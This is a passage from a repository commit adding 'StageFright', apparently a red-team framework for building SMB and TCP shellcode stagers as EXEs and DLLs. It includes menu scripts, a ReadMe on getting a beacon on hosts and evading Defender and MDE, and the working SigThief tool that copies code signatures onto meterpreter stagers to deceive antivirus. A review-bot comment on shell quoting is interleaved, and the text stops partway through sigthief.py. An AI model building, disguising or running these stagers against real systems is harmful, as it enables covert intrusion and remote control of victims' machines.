
Add files via upload

assume-breach 2 lat temu
rodzic
commit
5b951de043
46 zmienionych plików z 3928 dodań i 0 usunięć
  1. 76 0
      StageFright/StageFright/DLL.sh
  2. 76 0
      StageFright/StageFright/EXE.sh
  3. 65 0
      StageFright/StageFright/ReadMe.md
  4. 29 0
      StageFright/StageFright/Resources/LICENSE
  5. 93 0
      StageFright/StageFright/Resources/README.md
  6. 29 0
      StageFright/StageFright/Resources/SigThief/LICENSE
  7. 93 0
      StageFright/StageFright/Resources/SigThief/README.md
  8. 269 0
      StageFright/StageFright/Resources/SigThief/sigthief.py
  9. BIN
      StageFright/StageFright/SharedTCP.exe
  10. 76 0
      StageFright/StageFright/StageFright.sh
  11. BIN
      StageFright/StageFright/StageFright/Resources/OfficeSetup.exe
  12. 29 0
      StageFright/StageFright/StageFright/Resources/SigThief/LICENSE
  13. 93 0
      StageFright/StageFright/StageFright/Resources/SigThief/README.md
  14. 269 0
      StageFright/StageFright/StageFright/Resources/SigThief/sigthief.py
  15. 26 0
      StageFright/StageFright/StageFright/Resources/aesencrypt.py
  16. 26 0
      StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py
  17. 0 0
      StageFright/StageFright/StageFright/SMB/Resources/con.py
  18. 252 0
      StageFright/StageFright/StageFright/SMB/Resources/template.cpp
  19. 190 0
      StageFright/StageFright/StageFright/SMB/SMB.sh
  20. 4 0
      StageFright/StageFright/StageFright/SMB/conv.py
  21. 252 0
      StageFright/StageFright/StageFright/SMB/template.cpp
  22. 26 0
      StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py
  23. 0 0
      StageFright/StageFright/StageFright/SMBDLL/Resources/con.py
  24. BIN
      StageFright/StageFright/StageFright/SMBDLL/Resources/invoice.txt
  25. BIN
      StageFright/StageFright/StageFright/SMBDLL/Resources/malware.dll
  26. 252 0
      StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp
  27. 181 0
      StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh
  28. 4 0
      StageFright/StageFright/StageFright/SMBDLL/conv.py
  29. 252 0
      StageFright/StageFright/StageFright/SMBDLL/template.cpp
  30. 26 0
      StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py
  31. 0 0
      StageFright/StageFright/StageFright/TCP/Resources/con.py
  32. 160 0
      StageFright/StageFright/StageFright/TCP/Resources/template.cpp
  33. 189 0
      StageFright/StageFright/StageFright/TCP/TCP.sh
  34. 4 0
      StageFright/StageFright/StageFright/TCP/conv.py
  35. 69 0
      StageFright/StageFright/StageFright/TCP/tcp_server.py
  36. 160 0
      StageFright/StageFright/StageFright/TCP/template.cpp
  37. 26 0
      StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py
  38. 0 0
      StageFright/StageFright/StageFright/TCPDLL/Resources/con.py
  39. BIN
      StageFright/StageFright/StageFright/TCPDLL/Resources/malware.dll
  40. 188 0
      StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp
  41. 175 0
      StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh
  42. 4 0
      StageFright/StageFright/StageFright/TCPDLL/conv.py
  43. 188 0
      StageFright/StageFright/StageFright/TCPDLL/template.cpp
  44. BIN
      StageFright/StageFright/invoice.txt
  45. 8 0
      StageFright/StageFright/setup.sh
  46. 69 0
      StageFright/StageFright/tcp_server.py

+ 76 - 0
StageFright/StageFright/DLL.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+          **by assume-breach**
+
+       A staged payload framework. "
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE SMB Stager DLL"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE TCP Stager DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash StageFright/SMBDLL/SMBDLL.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash StageFright/TCPDLL/TCPDLL.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi
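Review bot: The menu comparison `if [ $CHOICE == 1 ]; then` (and the `elif` below it) leaves `$CHOICE` unquoted inside a single-bracket test, so pressing Enter with no input, or typing a value with spaces or glob characters, makes `[` print `unary operator expected` errors before it falls into the "Invalid option" branch; EXE.sh and StageFright.sh in this commit repeat the same pattern. Use `read -r CHOICE`, `if [[ "$CHOICE" == 1 ]]; then` and `elif [[ "$CHOICE" == 2 ]]; then` so empty or odd input is compared as a string and reaches the else branch cleanly. The sub-menu calls such as `bash StageFright/SMBDLL/SMBDLL.sh` are resolved against the caller's working directory rather than the script's location, so the StageFright.sh → DLL.sh → SMBDLL.sh chain only works when launched from the directory that holds StageFright.sh; a `cd "$(dirname "$0")" || exit 1` near the top of each script, or paths built from `${BASH_SOURCE[0]%/*}`, would remove that dependence. The block of colour variables and the `title` banner are duplicated verbatim across all three scripts and could be moved into one file they `source`.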

+ 76 - 0
StageFright/StageFright/EXE.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+          **by assume-breach**
+
+       A staged payload framework. "
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encrypted SMB Stager"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE AES Encrypted TCP Stager"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash StageFright/SMB/SMB.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash StageFright/TCP/TCP.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

+ 65 - 0
StageFright/StageFright/ReadMe.md

@@ -0,0 +1,65 @@
+![Screenshot 2023-11-29 at 1 43 30 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/b88fe959-5b3c-4b14-98a0-24b6c6f5b3e1)
+
+StageFright is a staged payload framework that allows the user to run customized staged payloads over various protocols. The framework is based on my blog article found here: https://medium.com/@assume-breach/home-grown-red-team-hosting-encrypted-stager-shellcode-1dc5e06eaeb3
+
+Right now, the only protocols in the framework are SMB and TCP. More will be available in the future; ie http/https.
+
+At this time, the tool will give you both DLLs and EXEs. 
+
+This is a replacement for the Shareable tool I uploaded a little while ago. Eventually, this tool will be merged into the Harriet tool, but for now, this is what I have finished. You can watch out for updates on Twitter as I will tweet out when new features and things have been added.
+
+How To Use
+
+bash StageFright.sh
+
+Go through the menus and select your stager. 
+
+![Screenshot 2023-11-29 at 1 54 06 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/316dcf6a-fa2c-48f5-8198-b01f00315fd1)
+
+SMB Stager
+
+For SMB enter the values for the share/shared folder that is writable. 
+
+![Screenshot 2023-11-29 at 1 55 41 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/dac1031c-b238-49bb-9280-9268e6582559)
+
+Upload your shellcode file to the share/shared folder.
+
+![Screenshot 2023-11-29 at 1 56 51 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/1bcd1a50-9452-45fd-af8c-a34e4dfaa1b9)
+
+Run the tool. 
+
+![Screenshot 2023-11-29 at 1 58 22 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/e8318b29-9a3d-43aa-944f-4ffb4df017fa)
+
+![Screenshot 2023-11-29 at 1 58 54 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/af11eac6-2e2a-4d69-92d4-6e974260997d)
+
+If you get onto another machine on the network that has access to the shared/shared folder you can retrieve the shellcode file and get a beacon. I ran the tool on my DC which has access to the shared folder. 
+
+![Screenshot 2023-11-29 at 2 01 04 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/f90ba02d-ca6c-447d-91e7-0960aa4f2fae)
+
+![Screenshot 2023-11-29 at 2 01 22 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/ba44db8f-7ce5-443d-8890-313b02c42467)
+
+TCP Stager
+
+Go through the script.
+
+![Screenshot 2023-11-29 at 2 04 04 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/76ff0178-f8b8-4b6b-9905-dbedde578275)
+
+You will have to host the TCP server. I have provided a python script to spin this up. You can find it in StageFright/StageFright/TCP. As of right now the script does not replace the values in the python script (it will over the next couple of days) so you will need to replace those values by hand. 
+
+![Screenshot 2023-11-29 at 2 06 21 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/8f26a283-045f-4ece-9b8f-c474c2e37e49)
+
+Run the script to start the TCP server.
+
+![Screenshot 2023-11-29 at 2 08 03 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/1b218e01-18a2-41d9-ad05-19a5ced4e12d)
+
+Transfer the EXE stager to the target and execute.
+
+![Screenshot 2023-11-29 at 2 10 04 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/d3cd2371-d869-4112-8115-584ec27ee31b)
+
+![Screenshot 2023-11-29 at 2 10 25 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/0882b329-ff59-41ea-ab5b-85f194a0de53)
+
+![Screenshot 2023-11-29 at 2 10 35 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/dec8fa57-3fee-49ac-a1a6-845660072854)
+
+Everything should work out of box on Kali but for Mint/Ubuntu you will need to install MingW64 for compilation. This is the beginning of the project. Mainly releasing this so I have a base to go off of. No OPSEC considerations have been made at this time. Native APIs are used in some cases. Whatever AV/EDR that this gets past at this point is unknown. It will get past Defender and MDE (P1 trial license) with no alerts.  
+
+

+ 29 - 0
StageFright/StageFright/Resources/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+ 93 - 0
StageFright/StageFright/Resources/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

+ 29 - 0
StageFright/StageFright/Resources/SigThief/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+ 93 - 0
StageFright/StageFright/Resources/SigThief/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

+ 269 - 0
StageFright/StageFright/Resources/SigThief/sigthief.py

@@ -0,0 +1,269 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
